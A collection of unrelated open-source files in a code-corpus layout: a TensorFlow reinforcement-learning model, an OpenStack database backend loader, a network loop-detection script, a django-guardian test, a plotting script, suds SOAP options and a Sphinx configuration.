self.d2 = self.dense_layer(self.rnn_out, 128, 'depth2')
self.logits_v = tf.squeeze(self.dense_layer(self.rnn_out, 1, 'logits_v', func=None), axis=[1])
self.logits_p = self.dense_layer(self.rnn_out, self.num_actions, 'logits_p', func=None)
if Config.USE_LOG_SOFTMAX:
self.softmax_p = tf.nn.softmax(self.logits_p)
self.log_softmax_p = tf.nn.log_softmax(self.logits_p)
self.log_selected_action_prob = tf.reduce_sum(self.log_softmax_p * self.action_index, axis=1)
self.cost_p_1 = self.log_selected_action_prob * (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(self.log_softmax_p * self.softmax_p, axis=1)
else:
self.softmax_p = (tf.nn.softmax(self.logits_p) + Config.MIN_POLICY) / (1.0 + Config.MIN_POLICY * self.num_actions)
self.selected_action_prob = tf.reduce_sum(self.softmax_p * self.action_index, axis=1)
self.cost_p_1 = tf.log(tf.maximum(self.selected_action_prob, self.log_epsilon)) \
* (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(tf.log(tf.maximum(self.softmax_p, self.log_epsilon)) *
self.softmax_p, axis=1)
# use a mask since we pad bactches of size < TIME_MAX
mask = tf.reduce_max(self.action_index,axis=1)
self.cost_v = 0.5 * tf.reduce_sum(tf.square(self.y_r - self.logits_v) * mask, axis=0)
self.cost_p_1_agg = tf.reduce_sum(self.cost_p_1 * mask, axis=0)
self.cost_p_2_agg = tf.reduce_sum(self.cost_p_2 * mask, axis=0)
# depth logits
self.d1_logits = [self.dense_layer(self.d1, Config.DEPTH_QUANTIZATION, 'logits_d1_%d'%i, func=None)
for i in range(Config.DEPTH_PIXELS)]
self.d2_logits = [self.dense_layer(self.d2, Config.DEPTH_QUANTIZATION, 'logits_d2_%d'%i, func=None)
for i in range(Config.DEPTH_PIXELS)]
self.d1_loss = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.d1_logits[i],
labels=self.depth_labels[i])*mask, axis=0) for i in range(Config.DEPTH_PIXELS)]
self.d2_loss = [tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.d2_logits[i],
labels=self.depth_labels[i])*mask, axis=0) for i in range(Config.DEPTH_PIXELS)]
# total depth loss
self.d1_loss = tf.add_n(self.d1_loss)
self.d2_loss = tf.add_n(self.d2_loss)
self.cost_p = -(self.cost_p_1_agg + self.cost_p_2_agg) + Config.BETA1*self.d1_loss + Config.BETA2*self.d2_loss
if Config.DUAL_RMSPROP:
self.opt_p = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
self.opt_v = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
else:
self.cost_all = self.cost_p + self.cost_v
self.opt = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
if Config.USE_GRAD_CLIP:
if Config.DUAL_RMSPROP:
self.opt_grad_v = self.opt_v.compute_gradients(self.cost_v)
self.opt_grad_v_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_v if not g is None]
self.train_op_v = self.opt_v.apply_gradients(self.opt_grad_v_clipped)
self.opt_grad_p = self.opt_p.compute_gradients(self.cost_p)
self.opt_grad_p_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_p if not g is None]
self.train_op_p = self.opt_p.apply_gradients(self.opt_grad_p_clipped)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.opt_grad = self.opt.compute_gradients(self.cost_all)
self.opt_grad_clipped = [(tf.clip_by_average_norm(g, Config.GRAD_CLIP_NORM),v) for g,v in self.opt_grad]
self.train_op = self.opt.apply_gradients(self.opt_grad_clipped)
else:
if Config.DUAL_RMSPROP:
self.train_op_v = self.opt_p.minimize(self.cost_v, global_step=self.global_step)
self.train_op_p = self.opt_v.minimize(self.cost_p, global_step=self.global_step)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.train_op = self.opt.minimize(self.cost_all, global_step=self.global_step)
def _create_tensor_board(self):
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES)
summaries.append(tf.summary.scalar("Pcost_advantage", self.cost_p_1_agg))
summaries.append(tf.summary.scalar("Pcost_entropy", self.cost_p_2_agg))
summaries.append(tf.summary.scalar("Pcost", self.cost_p))
summaries.append(tf.summary.scalar("Vcost", self.cost_v))
summaries.append(tf.summary.scalar("LearningRate", self.var_learning_rate))
summaries.append(tf.summary.scalar("Beta", self.var_beta))
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram("weights_%s" % var.name, var))
summaries.append(tf.summary.histogram("activation_n1", self.n1))
summaries.append(tf.summary.histogram("activation_n2", self.n2))
summaries.append(tf.summary.histogram("activation_enc", self.enc_out))
summaries.append(tf.summary.histogram("activation_v", self.logits_v))
summaries.append(tf.summary.histogram("activation_p", self.softmax_p))
self.summary_op = tf.summary.merge(summaries)
self.log_writer = tf.summary.FileWriter("logs/%s" % self.model_name, self.sess.graph)
def dense_layer(self, input, out_dim, name, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w', dtype=tf.float32, shape=[in_dim, out_dim], initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.matmul(input, w) + b
if func is not None:
output = func(output)
return output
def conv2d_layer(self, input, filter_size, out_dim, name, strides, func=tf.nn.relu):
in_dim = input.get_shape().as_list()[-1]
d = 1.0 / np.sqrt(filter_size * filter_size * in_dim)
with tf.variable_scope(name):
w_init = tf.random_uniform_initializer(-d, d)
b_init = tf.random_uniform_initializer(-d, d)
w = tf.get_variable('w',
shape=[filter_size, filter_size, in_dim, out_dim],
dtype=tf.float32,
initializer=w_init)
b = tf.get_variable('b', shape=[out_dim], initializer=b_init)
output = tf.nn.conv2d(input, w, strides=strides, padding='SAME') + b
if func is not None:
output = func(output)
return output
def __get_base_feed_dict(self):
return {self.var_beta: self.beta, self.var_learning_rate: self.learning_rate}
def get_global_step(self):
step = self.sess.run(self.global_step)
return step
def predict_single(self, x):
return self.predict_p(x[None, :])[0]
def predict_v(self, x):
prediction = self.sess.run(self.logits_v, feed_dict={self.x: x})
return prediction
def predict_p(self, x):
prediction = self.sess.run(self.softmax_p, feed_dict={self.x: x})
return prediction
def predict_p_and_v(self, x, c_batch, h_batch):
batch_size = x.shape[0]
im, depth_map, vel, p_action, p_reward = self.disentangle_obs(x)
feed_dict={self.x: im, self.seq_len: 1, self.p_rewards: p_reward,
self.aux_inp: np.concatenate((vel, p_action), axis=1)}
# shape of c/h_batch: (batch_size, Config.NUM_LSTMS, 256)
for i in range(Config.NUM_LSTMS):
c = c_batch[:,i,:]
h = h_batch[:,i,:]
feed_dict.update({self.state_in[i]: (c, h)})
if Config.NUM_LSTMS:
p, v, lstm_out = self.sess.run([self.softmax_p, self.logits_v,
self.state_out], feed_dict=feed_dict)
# reshape lstm_out(c/h) to: (batch_size, Config.NUM_LSTMS, 256)
c = np.zeros((batch_size, Config.NUM_LSTMS, 256),
dtype=np.float32)
h = np.zeros((batch_size, Config.NUM_LSTMS, 256),
dtype=np.float32)
for i in range(Config.NUM_LSTMS):
c[:,i,:] = lstm_out[i][0]
h[:,i,:] = lstm_out[i][1]
return p, v, c, h
else:
p, v = self.sess.run([self.softmax_p, self.logits_v], feed_dict=feed_dict)
return p, v, [None]*x.shape[0], [None]*x.shape[0]
def disentangle_obs(self, states):
"""
The obervations x is a concatenation of image, depth_map, prev_actn,
velocity vector, and prev_rewards. This function separate these
"""
batch_size = states.shape[0]
im_size = Config.IMAGE_HEIGHT*Config.IMAGE_WIDTH*Config.IMAGE_DEPTH
im = states[:, :im_size]
im = np.reshape(im, (batch_size, Config.IMAGE_HEIGHT, Config.IMAGE_WIDTH, Config.IMAGE_DEPTH))
states = states[:, im_size:]
dm_size = Config.DEPTH_PIXELS
dm_val = states[:, :dm_size].astype(int)
states = states[:, dm_size:]
depth_map = np.zeros((dm_size, batch_size, Config.DEPTH_QUANTIZATION))
for i in range(dm_size):
depth_map[i, np.arange(batch_size), dm_val[:,i].astype(int)] = 1 # make one-hot
vl_size = Config.VEL_DIM
vel = states[:, :vl_size]
states = states[:, vl_size:]
assert states.shape[1] == 2, "Missed something ?!"
p_action = np.zeros((batch_size, self.num_actions))
p_action[np.arange(batch_size), states[:,0].astype(int)] = 1 # make one-hot
p_reward = states[:, 1]
p_reward = np.reshape(p_reward, (batch_size, 1))
# return (batch_size, ...) arrays
return im, depth_map, vel, p_action, p_reward
def train(self, x, y_r, a, c, h, trainer_id):
feed_dict = self.__get_base_feed_dict()
im, depth_map, vel, p_action, p_reward = self.disentangle_obs(x)
feed_dict.update({self.x: im, self.y_r: y_r, self.action_index: a,
self.seq_len: int(Config.TIME_MAX), self.p_rewards: p_reward,
self.aux_inp: np.concatenate((vel, p_action), axis=1)})
# depth supervision
feed_dict.update({self.depth_labels[i]:depth_map[i] for i in
range(Config.DEPTH_PIXELS)})
for i in range(Config.NUM_LSTMS):
cb = np.array(c[i]).reshape((-1, 256))
hb = np.array(h[i]).reshape((-1, 256))
feed_dict.update({self.state_in[i]: (cb, hb)})
self.sess.run(self.train_op, feed_dict=feed_dict)
def log(self, x, y_r, a):
feed_dict = self.__get_base_feed_dict()
im, depth_map, vel, p_action, p_reward = self.disentangle_obs(x)
feed_dict.update({self.x: im, self.y_r: y_r, self.action_index: a})
step, summary = self.sess.run([self.global_step, self.summary_op], feed_dict=feed_dict)
self.log_writer.add_summary(summary, step)
def _checkpoint_filename(self, episode):
return 'checkpoints/%s_%08d' % (self.model_name, episode)
def _get_episode_from_filename(self, filename):
# TODO: hacky way of getting the episode. ideally episode should be stored as a TF variable
return int(re.split('/|_|\.', filename)[2])
def save(self, episode):
self.saver.save(self.sess, self._checkpoint_filename(episode))
def load(self):
filename = tf.train.latest_checkpoint(os.path.dirname(self._checkpoint_filename(episode=0)))
if Config.LOAD_EPISODE > 0:
filename = self._checkpoint_filename(Config.LOAD_EPISODE)
self.saver.restore(self.sess, filename)
return self._get_episode_from_filename(filename)
def get_variables_names(self):
return [var.name for var in self.graph.get_collection('trainable_variables')]
def get_variable_value(self, name):
return self.sess.run(self.graph.get_tensor_by_name(name))
| gpl-2.0 |
lakshmi-kannan/matra | openstack/common/db/api.py | 6 | 3775 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Multiple DB API backend support.
Supported configuration options:
The following two parameters are in the 'database' group:
`backend`: DB backend name or full module path to DB backend module.
`use_tpool`: Enable thread pooling of DB API calls.
A DB backend module should implement a method named 'get_backend' which
takes no arguments. The method can return any object that implements DB
API methods.
*NOTE*: There are bugs in eventlet when using tpool combined with
threading locks. The python logging module happens to use such locks. To
work around this issue, be sure to specify thread=False with
eventlet.monkey_patch().
A bug for eventlet has been filed here:
https://bitbucket.org/eventlet/eventlet/issue/137/
"""
import functools
from oslo.config import cfg
from heat.openstack.common import importutils
from heat.openstack.common import lockutils
db_opts = [
cfg.StrOpt('backend',
default='sqlalchemy',
deprecated_name='db_backend',
deprecated_group='DEFAULT',
help='The backend to use for db'),
cfg.BoolOpt('use_tpool',
default=False,
deprecated_name='dbapi_use_tpool',
deprecated_group='DEFAULT',
help='Enable the experimental use of thread pooling for '
'all DB API calls')
]
CONF = cfg.CONF
CONF.register_opts(db_opts, 'database')
class DBAPI(object):
def __init__(self, backend_mapping=None):
if backend_mapping is None:
backend_mapping = {}
self.__backend = None
self.__backend_mapping = backend_mapping
@lockutils.synchronized('dbapi_backend', 'heat-')
def __get_backend(self):
"""Get the actual backend. May be a module or an instance of
a class. Doesn't matter to us. We do this synchronized as it's
possible multiple greenthreads started very quickly trying to do
DB calls and eventlet can switch threads before self.__backend gets
assigned.
"""
if self.__backend:
# Another thread assigned it
return self.__backend
backend_name = CONF.database.backend
self.__use_tpool = CONF.database.use_tpool
if self.__use_tpool:
from eventlet import tpool
self.__tpool = tpool
# Import the untranslated name if we don't have a
# mapping.
backend_path = self.__backend_mapping.get(backend_name,
backend_name)
backend_mod = importutils.import_module(backend_path)
self.__backend = backend_mod.get_backend()
return self.__backend
def __getattr__(self, key):
backend = self.__backend or self.__get_backend()
attr = getattr(backend, key)
if not self.__use_tpool or not hasattr(attr, '__call__'):
return attr
def tpool_wrapper(*args, **kwargs):
return self.__tpool.execute(attr, *args, **kwargs)
functools.update_wrapper(tpool_wrapper, attr)
return tpool_wrapper
| apache-2.0 |
Br1an6/ACS_Netplumber_Implementation | hsa-python/net_plumbing/examples/stanford/run_loop_detection_su_bb.py | 5 | 3146 | '''
<Run loop detection test on Stanford network>
Copyright 2012, Stanford University. This file is licensed under GPL v2 plus
a special exception, as described in included LICENSE_EXCEPTION.txt.
Created on Aug 14, 2011
@author: Peyman Kazemian
'''
from examples.utils.network_loader import load_network
from config_parser.cisco_router_parser import cisco_router
from time import time
from headerspace.applications import detect_loop,print_paths
settings = {"rtr_names":["bbra_rtr",
"bbrb_rtr",
"boza_rtr",
"bozb_rtr",
"coza_rtr",
"cozb_rtr",
"goza_rtr",
"gozb_rtr",
"poza_rtr",
"pozb_rtr",
"roza_rtr",
"rozb_rtr",
"soza_rtr",
"sozb_rtr",
"yoza_rtr",
"yozb_rtr",
],
"num_layers":3,
"fwd_engine_layer":2,
"input_path":"tf_stanford_backbone",
"switch_id_multiplier":cisco_router.SWITCH_ID_MULTIPLIER,
"port_type_multiplier":cisco_router.PORT_TYPE_MULTIPLIER,
"out_port_type_const":cisco_router.OUTPUT_PORT_TYPE_CONST,
"remove_duplicates":True,
}
(ntf,ttf,port_map,port_reverse_map) = load_network(settings)
output_port_addition = cisco_router.PORT_TYPE_MULTIPLIER * \
cisco_router.OUTPUT_PORT_TYPE_CONST
#ports that should be used in loop detection test
loop_port_ids = [
port_map["bbra_rtr"]["te7/1"],
port_map["bbrb_rtr"]["te7/1"],
port_map["bbra_rtr"]["te6/3"],
port_map["bbrb_rtr"]["te7/4"],
port_map["bbra_rtr"]["te7/2"],
port_map["bbrb_rtr"]["te1/1"],
port_map["bbra_rtr"]["te6/1"],
port_map["bbrb_rtr"]["te6/3"],
port_map["bbra_rtr"]["te1/4"],
port_map["bbrb_rtr"]["te1/3"],
port_map["bbra_rtr"]["te1/3"],
port_map["bbrb_rtr"]["te7/2"],
port_map["bbra_rtr"]["te7/3"],
port_map["bbrb_rtr"]["te6/1"],
port_map["boza_rtr"]["te2/3"],
port_map["coza_rtr"]["te2/3"],
port_map["yozb_rtr"]["te1/3"],
port_map["yozb_rtr"]["te1/2"],
port_map["yoza_rtr"]["te1/1"],
port_map["yoza_rtr"]["te1/2"],
port_map["bozb_rtr"]["te2/3"],
port_map["cozb_rtr"]["te2/3"],
port_map["gozb_rtr"]["te2/3"],
port_map["pozb_rtr"]["te2/3"],
port_map["goza_rtr"]["te2/3"],
port_map["poza_rtr"]["te2/3"],
port_map["rozb_rtr"]["te2/3"],
port_map["sozb_rtr"]["te2/3"],
port_map["roza_rtr"]["te2/3"],
port_map["soza_rtr"]["te2/3"],
]
st = time()
loops = detect_loop(ntf,ttf,loop_port_ids,None,output_port_addition)
en = time()
print_paths(loops, port_reverse_map)
print "Found ",len(loops)," loops in ",en-st," seconds."
| gpl-2.0 |
sustainingtechnologies/django-guardian | guardian/testapp/tests/orphans_test.py | 21 | 3746 | from __future__ import unicode_literals
# Try the new app settings (Django 1.7) and fall back to the old system
try:
from django.apps import apps as django_apps
auth_app = django_apps.get_app_config("auth")
except ImportError:
from django.contrib.auth import models as auth_app
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.test import TestCase
from guardian.compat import get_user_model, create_permissions
from guardian.utils import clean_orphan_obj_perms
from guardian.shortcuts import assign_perm
from guardian.models import Group
from guardian.testapp.tests.conf import skipUnlessTestApp
User = get_user_model()
user_module_name = User._meta.module_name
@skipUnlessTestApp
class OrphanedObjectPermissionsTest(TestCase):
def setUp(self):
# Create objects for which we would assing obj perms
self.target_user1 = User.objects.create(username='user1')
self.target_group1 = Group.objects.create(name='group1')
self.target_obj1 = ContentType.objects.create(name='ct1', model='foo',
app_label='fake-for-guardian-tests')
self.target_obj2 = ContentType.objects.create(name='ct2', model='bar',
app_label='fake-for-guardian-tests')
# Required if MySQL backend is used :/
create_permissions(auth_app, [], 1)
self.user = User.objects.create(username='user')
self.group = Group.objects.create(name='group')
def test_clean_perms(self):
# assign obj perms
target_perms = {
self.target_user1: ["change_%s" % user_module_name],
self.target_group1: ["delete_group"],
self.target_obj1: ["change_contenttype", "delete_contenttype"],
self.target_obj2: ["change_contenttype"],
}
obj_perms_count = sum([len(val) for key, val in target_perms.items()])
for target, perms in target_perms.items():
target.__old_pk = target.pk # Store pkeys
for perm in perms:
assign_perm(perm, self.user, target)
# Remove targets
for target, perms in target_perms.items():
target.delete()
# Clean orphans
removed = clean_orphan_obj_perms()
self.assertEqual(removed, obj_perms_count)
# Recreate targets and check if user has no permissions
for target, perms in target_perms.items():
target.pk = target.__old_pk
target.save()
for perm in perms:
self.assertFalse(self.user.has_perm(perm, target))
def test_clean_perms_command(self):
"""
Same test as the one above but rather function directly, we call
management command instead.
"""
# assign obj perms
target_perms = {
self.target_user1: ["change_%s" % user_module_name],
self.target_group1: ["delete_group"],
self.target_obj1: ["change_contenttype", "delete_contenttype"],
self.target_obj2: ["change_contenttype"],
}
for target, perms in target_perms.items():
target.__old_pk = target.pk # Store pkeys
for perm in perms:
assign_perm(perm, self.user, target)
# Remove targets
for target, perms in target_perms.items():
target.delete()
# Clean orphans
call_command("clean_orphan_obj_perms", verbosity=0)
# Recreate targets and check if user has no permissions
for target, perms in target_perms.items():
target.pk = target.__old_pk
target.save()
for perm in perms:
self.assertFalse(self.user.has_perm(perm, target))
| bsd-2-clause |
vibhaa/propane | scripts/propane/backbone.py | 2 | 4328 | import csv
import os.path
import numpy as np
import matplotlib.pyplot as plt
# collect stats from csv
num_pods = []
num_nodes = []
sizes_raw = []
sizes_compressed = []
tpp_total_mean = []
tpp_build_mean = []
tpp_minimize_mean = []
tpp_order_mean = []
tpp_gen_mean = []
tpp_compress_mean = []
# read values from csv file
direct = os.path.dirname(os.path.realpath(__file__))
with open(direct + os.path.sep + 'stats-backbone.csv') as f:
r = csv.reader(f)
for row in r:
num_pods.append(row[0])
num_nodes.append(row[1])
sizes_raw.append(row[4])
sizes_compressed.append(row[5])
tpp_total_mean.append(row[10])
tpp_build_mean.append(row[13])
tpp_minimize_mean.append(row[16])
tpp_order_mean.append(row[19])
tpp_gen_mean.append(row[22])
tpp_compress_mean.append(row[25])
# remove header info, and convert type
num_pods = map(int, num_pods[1:])
num_nodes = map(int, num_nodes[1:])
sizes_raw = map(int, sizes_raw[1:])
sizes_compressed = map(int, sizes_compressed[1:])
tpp_total_mean = map(float, tpp_total_mean[1:])
tpp_build_mean = map(float, tpp_build_mean[1:])
tpp_minimize_mean = map(float, tpp_minimize_mean[1:])
tpp_order_mean = map(float, tpp_order_mean[1:])
tpp_gen_mean = map(float, tpp_gen_mean[1:])
tpp_compress_mean = map(float, tpp_compress_mean[1:])
#====================================================
#
# Stack plot of compilation times broken down by task
#
#====================================================
# stack data lowest -> highest (build, minimize, order, gen, compress)
data = (tpp_build_mean, tpp_minimize_mean, tpp_order_mean, tpp_gen_mean)
foo = np.row_stack( data )
y_stack = np.cumsum(foo, axis=0)
# plot colors
#color1 = "#FFC09F"
#color2 = "#FFEE93"
#color3 = "#FCF5C7"
#color4 = "#A0CED9"
#color5 = "#ADF7B6"
color1 = "#828A95"
color2 = "#CEEAF7"
color3 = "#CCD7E4"
color4 = "#D5C9DF"
# color5 = "#DCB8CB"
# stacked plot showing different running times
fig = plt.figure()
plt.grid()
ax1 = fig.add_subplot(111)
ax1.fill_between(num_nodes, 0, y_stack[0,:], facecolor=color1, alpha=.7)
ax1.fill_between(num_nodes, y_stack[0,:], y_stack[1,:], facecolor=color2, alpha=.7)
ax1.fill_between(num_nodes, y_stack[1,:], y_stack[2,:], facecolor=color3)
ax1.fill_between(num_nodes, y_stack[2,:], y_stack[3,:], facecolor=color4)
ax1.set_xlabel('Routers', fontsize=35)
ax1.set_ylabel('Avg. Time / Predicate (s)', fontsize=35)
ax1.tick_params(axis='both', which='major', labelsize=35)
ax1.tick_params(axis='both', which='minor', labelsize=35)
ax1.xaxis.set_ticks([0,40,80,120,160,200])
ax1.yaxis.set_ticks([5,15,25,35,45])
#ax1.set_xlim([0,1400])
#ax1.set_ylim([0,20])
# custom legend for stack color
p1 = plt.Rectangle((0, 0), 1, 1, fc=color1, alpha=.7)
p2 = plt.Rectangle((0, 0), 1, 1, fc=color2, alpha=.7)
p3 = plt.Rectangle((0, 0), 1, 1, fc=color3, alpha=.7)
p4 = plt.Rectangle((0, 0), 1, 1, fc=color4, alpha=.7)
leg_boxes = [p4, p3, p2, p1]
descrs = ["Gen/Min ABGP", "Find Preferences", "Minimize PG", "Construct PG"]
ax1.legend(leg_boxes, descrs, loc=2, fontsize=24)
fig.savefig('compilation-times-backbone.png', bbox_inches='tight')
#====================================================
#
# Size of generated vs compressed ABGP (bar)
#
#====================================================
num_nodes1 = num_nodes
num_nodes2 = map(lambda x: x, num_nodes)
sizes_raw_per = map(lambda (size,n): size/n, zip(sizes_raw, num_nodes))
sizes_compressed_per = map(lambda (size,n): size/n, zip(sizes_compressed, num_nodes))
num_nodes1 = num_nodes1[2::5]
num_nodes2 = num_nodes2[2::5]
sizes_raw_per = sizes_raw_per[2::5]
sizes_compressed_per = sizes_compressed_per[2::5]
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.bar(num_nodes1, sizes_raw_per, width=5.2, color=color1, alpha=1, align='center', log=True)
ax1.bar(num_nodes2, sizes_compressed_per, width=5.2, color=color3, alpha=1, align='center',log=True)
ax1.set_xlabel('Routers', fontsize=35)
ax1.set_ylabel('ABGP Lines/Router', fontsize=35)
ax1.tick_params(axis='both', which='major', labelsize=35)
ax1.tick_params(axis='both', which='minor', labelsize=35)
ax1.set_xlim([0,220])
ax1.set_ylim([0,10*10*10*10*10*10*10])
leg_boxes = [p1, p3]
descrs = ["Raw Config", "Minimized Config"]
ax1.legend(leg_boxes, descrs, loc=2, fontsize=24)
fig.savefig('config-compression-backbone.png', bbox_inches='tight') | mit |
TNosredna/CouchPotatoServer | libs/suds/options.py | 165 | 5074 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Suds basic options classes.
"""
from suds.properties import *
from suds.wsse import Security
from suds.xsd.doctor import Doctor
from suds.transport import Transport
from suds.cache import Cache, NoCache
class TpLinker(AutoLinker):
"""
Transport (auto) linker used to manage linkage between
transport objects Properties and those Properties that contain them.
"""
def updated(self, properties, prev, next):
if isinstance(prev, Transport):
tp = Unskin(prev.options)
properties.unlink(tp)
if isinstance(next, Transport):
tp = Unskin(next.options)
properties.link(tp)
class Options(Skin):
"""
Options:
- B{cache} - The XML document cache. May be set (None) for no caching.
- type: L{Cache}
- default: L{NoCache}
- B{faults} - Raise faults raised by server,
else return tuple from service method invocation as (httpcode, object).
- type: I{bool}
- default: True
- B{service} - The default service name.
- type: I{str}
- default: None
- B{port} - The default service port name, not tcp port.
- type: I{str}
- default: None
- B{location} - This overrides the service port address I{URL} defined
in the WSDL.
- type: I{str}
- default: None
- B{transport} - The message transport.
- type: L{Transport}
- default: None
- B{soapheaders} - The soap headers to be included in the soap message.
- type: I{any}
- default: None
- B{wsse} - The web services I{security} provider object.
- type: L{Security}
- default: None
- B{doctor} - A schema I{doctor} object.
- type: L{Doctor}
- default: None
- B{xstq} - The B{x}ml B{s}chema B{t}ype B{q}ualified flag indicates
that the I{xsi:type} attribute values should be qualified by namespace.
- type: I{bool}
- default: True
- B{prefixes} - Elements of the soap message should be qualified (when needed)
using XML prefixes as opposed to xmlns="" syntax.
- type: I{bool}
- default: True
- B{retxml} - Flag that causes the I{raw} soap envelope to be returned instead
of the python object graph.
- type: I{bool}
- default: False
- B{prettyxml} - Flag that causes I{pretty} xml to be rendered when generating
the outbound soap envelope.
- type: I{bool}
- default: False
- B{autoblend} - Flag that ensures that the schema(s) defined within the
WSDL import each other.
- type: I{bool}
- default: False
- B{cachingpolicy} - The caching policy.
- type: I{int}
- 0 = Cache XML documents.
- 1 = Cache WSDL (pickled) object.
- default: 0
- B{plugins} - A plugin container.
- type: I{list}
"""
def __init__(self, **kwargs):
domain = __name__
definitions = [
Definition('cache', Cache, NoCache()),
Definition('faults', bool, True),
Definition('transport', Transport, None, TpLinker()),
Definition('service', (int, basestring), None),
Definition('port', (int, basestring), None),
Definition('location', basestring, None),
Definition('soapheaders', (), ()),
Definition('wsse', Security, None),
Definition('doctor', Doctor, None),
Definition('xstq', bool, True),
Definition('prefixes', bool, True),
Definition('retxml', bool, False),
Definition('prettyxml', bool, False),
Definition('autoblend', bool, False),
Definition('cachingpolicy', int, 0),
Definition('plugins', (list, tuple), []),
]
Skin.__init__(self, domain, definitions, kwargs)
| gpl-3.0 |
prikhi/pencil | docs/source/conf.py | 1 | 8538 | # -*- coding: utf-8 -*-
#
# Pencil documentation build configuration file, created by
# sphinx-quickstart on Sat Mar 28 12:07:54 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# Is the build being run by ReadTheDocs.org or locally?
on_readthedocs = os.environ.get("READTHEDOCS", None) == 'True'
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo', 'sphinxcontrib.autoanysrc',
]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Pencil'
copyright = u'2015, Pencil Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0.21'
# The full version, including alpha/beta/rc tags.
release = '2.0.21'
primary_domain = 'js'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
if not on_readthedocs:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
